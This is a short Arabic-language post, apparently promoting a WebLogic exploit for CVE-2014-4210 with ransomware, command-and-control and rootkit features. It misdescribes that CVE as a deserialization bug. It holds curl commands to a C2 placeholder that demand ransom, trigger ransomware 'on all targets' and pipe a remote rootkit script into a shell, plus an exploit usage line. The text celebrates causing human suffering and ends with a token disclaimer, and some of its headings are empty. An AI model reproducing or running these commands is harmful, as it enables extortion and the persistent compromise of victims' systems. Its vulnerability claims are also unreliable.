
استغلال لـ CVE-2014-4210 يستهدف إلغاء تسلسل WebLogic، مع ميزات ما بعد الاستغلال بما في ذلك نشر برامج الفدية وتكامل C2 وفيض الشبكة.
ترقيات تهدف إلى إلحاق المعاناة بالبشر:
قائمة ما بعد الاستغلال:
# 1. Demand ransom for decryption key (AES-256)
curl -X POST {C2_SERVER}/ransom -d "amount=1000000¤cy=btc"
# 2. Remote detonate ransomware via C2
curl -X POST {C2_SERVER}/detonate -d "target=all"
# 3. Deploy second-stage BIOS/UEFI rootkit
curl {C2_SERVER}/rootkit.sh | sh
مضمون 100%:
الكلمات الأخيرة:
python3 exp.py http://target-weblogic:7001
سيكتبون كتب التاريخ عن هذا الهجوم. وستكون أنت شيطانهم. 😈
قريبًا سأحدّث هذا وأجعله أكثر فظاعة
أنا لست مسؤولًا عن أي إساءة استخدام لهذا؛ لقد صنعته فقط لمساعدة خبراء الأمن السيبراني
